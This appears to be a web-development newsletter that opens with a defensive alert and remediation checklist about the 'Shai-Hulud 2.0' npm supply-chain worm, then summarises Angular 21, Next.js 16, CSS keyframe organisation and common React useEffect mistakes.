Hello readers, this month, reality shifted for the JavaScript ecosystem. While we usually love sharing new features, security comes first.

We are leading this edition with a critical alert regarding the recent massive supply-chain attack on the NPM registry. Following that, we have the latest updates on Angular 21, Next.js 16, and architectural tips for your CSS and React workflows.

Here is what you need to know and - more importantly - what you need to do.

Massive NPM supply‑chain attack (Shai‑Hulud 2.0)

The JavaScript ecosystem is facing a major campaign - often labeled Shai‑Hulud 2.0 - that trojanizes packages to steal developer tokens.

Why this is different: Unlike typical malware, this attack uses wormable propagation. Infected packages harvest CI/dev credentials and use them to publish new malicious versions to other repositories, accelerating the spread. Because these scripts execute on local developer machines and CI runners, your internal infrastructure is at risk.

The "Product Builder" defense checklist: If you manage a JS/TS stack, we recommend running this remediation immediately:

1. Stop risky installs: Temporarily disable lifecycle scripts in your environment.
2. Command: npm install --ignore‑scripts
3. Freeze updates: Hold off on installing newly published versions of packages until they are verified.
4. Inspect CI logs: Search your builds for unexpected outbound requests or git pushes immediately following an npm install.
5. Rotate credentials: If you suspect exposure, rotate your npm, GitHub, and Cloud tokens immediately.

Pro tip: For long-term hardening, ensure your CI pipeline fails builds when high-risk dependencies are detected by using SCA tools like Snyk or GitHub Advanced Security.

Read the full analysis and incident playbook here.

What’s new in Angular 21?

The Angular team has released version 21, continuing their momentum toward a lighter, faster developer experience.

1. Signal-based forms: A major shift introducing a new reactive form primitive, making form state significantly easier to reason about.
2. MCP Server support: Optimizes how LLMs interpret and utilize Angular-specific features.
3. Zoneless by default: The final removal of zone.js means better performance and easier debugging.
4. Vitest integration: Now the default test runner, offering faster execution out of the box.

Read the official announcement here.

Next.js 16 has landed

A popular React-based framework just received a major update packed with features for scaling products:

1. Cache Component: New explicit caching APIs give you finer control over data freshness - crucial for high-traffic SaaS products.
2. Turbopack Stability: Now the default for development and builds, promising significantly faster iteration cycles.
3. DevTools MCP Server: Better integration for AI-assisted workflows.

Check out the release notes here.

Better architecture: Organizing CSS animation keyframes

In large-scale product builds, global CSS definitions often lead to clashes and duplication.

Keyframes are necessary to define animation steps, but they don't have to be messy. Check out a guide on how to treat CSS like software logic - creating reusable, modular keyframe definitions that keep your codebase clean.

Learn how to reuse keyframes effectively here.

Common useEffect mistakes in React

The useEffect hook is powerful, but it is also the source of many performance bottlenecks and infinite loops in React applications.

Are you over-fetching data? Missing dependency arrays? See a breakdown of the most common anti-patterns we see in code reviews and how to refactor them for stability.

Fix your React hooks here.

Interested in web dev? Read more
More blogs focused on security coming soon!